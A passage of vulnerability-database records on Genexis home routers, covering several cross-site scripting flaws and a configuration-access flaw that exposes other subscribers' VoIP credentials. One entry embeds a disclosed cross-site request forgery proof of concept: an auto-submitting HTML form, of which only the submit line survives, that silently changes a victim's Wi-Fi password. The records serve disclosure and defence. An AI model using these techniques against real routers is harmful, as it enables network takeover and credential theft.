"title": "Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47858",
"datePublished": "2026-01-21T17:27:40.393Z",
"dateReserved": "2026-01-14T17:11:19.904Z",
"dateUpdated": "2026-03-05T01:28:55.504Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-8022 (GCVE-0-2024-8022)
Vulnerability from cvelistv5 – Published: 2024-08-20 23:31 – Updated: 2024-08-22 13:53- CWE-79 - Cross Site Scripting
| URL | Tags |
|---|---|
| https://vuldb.com/?id.275291 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.275291 | signaturepermissions-required |
| https://vuldb.com/?submit.389913 | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Tilgin Home Gateway |
Affected:
322_AS0500-03_05_13_05
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-8022",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-22T13:53:14.296828Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-22T13:53:24.884Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Tilgin Home Gateway",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "322_AS0500-03_05_13_05"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "The_Druk (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05. It has been rated as problematic. This issue affects some unknown processing of the file /vood/cgi-bin/vood_view.cgi?lang=EN\u0026act=user/spec_conf\u0026sessionId=86213915328111654515\u0026user=A\u0026message2user=Account%20updated. The manipulation of the argument Phone Number leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Eine Schwachstelle wurde in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05 ausgemacht. Sie wurde als problematisch eingestuft. Es geht hierbei um eine nicht n\u00e4her spezifizierte Funktion der Datei /vood/cgi-bin/vood_view.cgi?lang=EN\u0026act=user/spec_conf\u0026sessionId=86213915328111654515\u0026user=A\u0026message2user=Account%20updated. Mittels dem Manipulieren des Arguments Phone Number mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk angegangen werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 4,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-20T23:31:03.646Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-275291 | Genexis Tilgin Home Gateway cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.275291"
},
{
"name": "VDB-275291 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.275291"
},
{
"name": "Submit #389913 | Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05 Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.389913"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-08-20T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-08-20T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-08-20T20:07:07.000Z",
"value": "VulDB entry last update"
}
],
"title": "Genexis Tilgin Home Gateway cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-8022",
"datePublished": "2024-08-20T23:31:03.646Z",
"dateReserved": "2024-08-20T18:01:40.875Z",
"dateUpdated": "2024-08-22T13:53:24.884Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-6355 (GCVE-0-2024-6355)
Vulnerability from cvelistv5 – Published: 2024-06-26 21:00 – Updated: 2024-08-01 21:33- CWE-79 - Cross Site Scripting
| URL | Tags |
|---|---|
| https://vuldb.com/?id.269755 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.269755 | signaturepermissions-required |
| https://vuldb.com/?submit.359289 | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Tilgin Fiber Home Gateway HG1522 |
Affected:
CSx000-01_09_01_12
|
|
| genexis | tilgin_fiber_home_gateway_hg1522 |
Affected:
csx000_01_09_01_12
cpe:2.3:a:genexis:tilgin_fiber_home_gateway_hg1522:csx000_01_09_01_12:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:genexis:tilgin_fiber_home_gateway_hg1522:csx000_01_09_01_12:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "tilgin_fiber_home_gateway_hg1522",
"vendor": "genexis",
"versions": [
{
"status": "affected",
"version": "csx000_01_09_01_12"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-6355",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-27T13:18:19.856295Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T13:26:45.170Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:33:05.432Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "VDB-269755 | Genexis Tilgin Fiber Home Gateway HG1522 cross site scripting",
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.269755"
},
{
"name": "VDB-269755 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.269755"
},
{
"name": "Submit #359289 | Tilgin FIBER HOME GATEWAY HG1522 HG13xxx_CSx000-01_09_01_12 Cross Site Scripting",
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://vuldb.com/?submit.359289"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Tilgin Fiber Home Gateway HG1522",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "CSx000-01_09_01_12"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "The_Druk (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Genexis Tilgin Fiber Home Gateway HG1522 CSx000-01_09_01_12. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /status/product_info/. The manipulation of the argument product_info leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269755. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "In Genexis Tilgin Fiber Home Gateway HG1522 CSx000-01_09_01_12 wurde eine problematische Schwachstelle ausgemacht. Es geht um eine nicht n\u00e4her bekannte Funktion der Datei /status/product_info/. Mit der Manipulation des Arguments product_info mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 5,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T21:00:05.252Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-269755 | Genexis Tilgin Fiber Home Gateway HG1522 cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.269755"
},
{
"name": "VDB-269755 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.269755"
},
{
"name": "Submit #359289 | Tilgin FIBER HOME GATEWAY HG1522 HG13xxx_CSx000-01_09_01_12 Cross Site Scripting",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.359289"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-06-26T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-06-26T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-06-26T18:28:46.000Z",
"value": "VulDB entry last update"
}
],
"title": "Genexis Tilgin Fiber Home Gateway HG1522 cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-6355",
"datePublished": "2024-06-26T21:00:05.252Z",
"dateReserved": "2024-06-26T16:23:42.937Z",
"dateUpdated": "2024-08-01T21:33:05.432Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-6108 (GCVE-0-2024-6108)
Vulnerability from cvelistv5 – Published: 2024-06-18 10:00 – Updated: 2024-08-01 21:33- CWE-80 - Basic Cross Site Scripting
| URL | Tags |
|---|---|
| https://vuldb.com/?id.268854 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.268854 | signaturepermissions-required |
| https://vuldb.com/?submit.353708 | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Genexis | Tilgin Home Gateway |
Affected:
322_AS0500-03_05_13_05
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-6108",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-25T17:57:09.219869Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T17:57:17.846Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:33:05.244Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "VDB-268854 | Genexis Tilgin Home Gateway Login cross site scripting",
"tags": [
"vdb-entry",
"technical-description",
"x_transferred"
],
"url": "https://vuldb.com/?id.268854"
},
{
"name": "VDB-268854 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required",
"x_transferred"
],
"url": "https://vuldb.com/?ctiid.268854"
},
{
"name": "Submit #353708 | tilgin Residential Gateway 322_AS0500-03_05_13_05 Injection",
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://vuldb.com/?submit.353708"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"modules": [
"Login"
],
"product": "Tilgin Home Gateway",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "322_AS0500-03_05_13_05"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "The_Druk (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05. It has been classified as problematic. Affected is an unknown function of the file /vood/cgi-bin/vood_view.cgi?act=index\u0026lang=EN# of the component Login. The manipulation of the argument errmsg leads to basic cross site scripting. It is possible to launch the attack remotely. VDB-268854 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "de",
"value": "Es wurde eine problematische Schwachstelle in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05 ausgemacht. Betroffen hiervon ist ein unbekannter Ablauf der Datei /vood/cgi-bin/vood_view.cgi?act=index\u0026lang=EN# der Komponente Login. Durch die Manipulation des Arguments errmsg mit unbekannten Daten kann eine basic cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff \u00fcber das Netzwerk."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 5,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-80",
"description": "CWE-80 Basic Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-18T10:00:04.950Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-268854 | Genexis Tilgin Home Gateway Login cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.268854"
},
{
"name": "VDB-268854 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.268854"
},
{
"name": "Submit #353708 | tilgin Residential Gateway 322_AS0500-03_05_13_05 Injection",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.353708"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-06-18T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-06-18T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-06-18T07:13:46.000Z",
"value": "VulDB entry last update"
}
],
"title": "Genexis Tilgin Home Gateway Login cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-6108",
"datePublished": "2024-06-18T10:00:04.950Z",
"dateReserved": "2024-06-18T05:06:31.620Z",
"dateUpdated": "2024-08-01T21:33:05.244Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-6094 (GCVE-0-2017-6094)
Vulnerability from cvelistv5 – Published: 2017-12-20 20:00 – Updated: 2024-08-05 15:18- n/a
| URL | Tags |
|---|---|
| http://seclists.org/fulldisclosure/2017/Dec/62 | mailing-listx_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T15:18:49.781Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20171219 CVE-2017-6094 - Genexis GAPS Access Control Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2017/Dec/62"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-12-18T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain \"chk\" value (48bit) derived from the MAC. The algorithm used to compute the \"chk\" was disclosed by reverse engineering the CPE\u0027s firmware. As a result, it is possible to forge valid \"chk\" values for any given MAC address and therefore receive the configuration settings of other subscribers\u0027 CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-12-20T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20171219 CVE-2017-6094 - Genexis GAPS Access Control Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2017/Dec/62"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-6094",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain \"chk\" value (48bit) derived from the MAC. The algorithm used to compute the \"chk\" was disclosed by reverse engineering the CPE\u0027s firmware. As a result, it is possible to forge valid \"chk\" values for any given MAC address and therefore receive the configuration settings of other subscribers\u0027 CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20171219 CVE-2017-6094 - Genexis GAPS Access Control Vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2017/Dec/62"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-6094",
"datePublished": "2017-12-20T20:00:00.000Z",
"dateReserved": "2017-02-18T00:00:00.000Z",
"dateUpdated": "2024-08-05T15:18:49.781Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-202009-0727
Vulnerability from variot - Updated: 2024-02-13 23:03A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
Date: 28-08-2020
Vendor Homepage: https://www.gxgroup.eu/ont-products/
Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
Version: v2.1 (software version P4410-V2-1.28)
CVE : CVE-2020-25015
-
Proof of Concept
Create an HTML file with the following code:
history.pushState('', '', '/') document.forms[0].submit();Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
-
PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
-
Timeline
Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202009-0727",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2-1.28"
},
{
"model": "platinum",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "4410v2-1.28"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.28:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:genexis:platinum_4410:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jinson Varghese Behanan",
"sources": [
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.7
},
"cve": "CVE-2020-25015",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-56086",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-25015",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
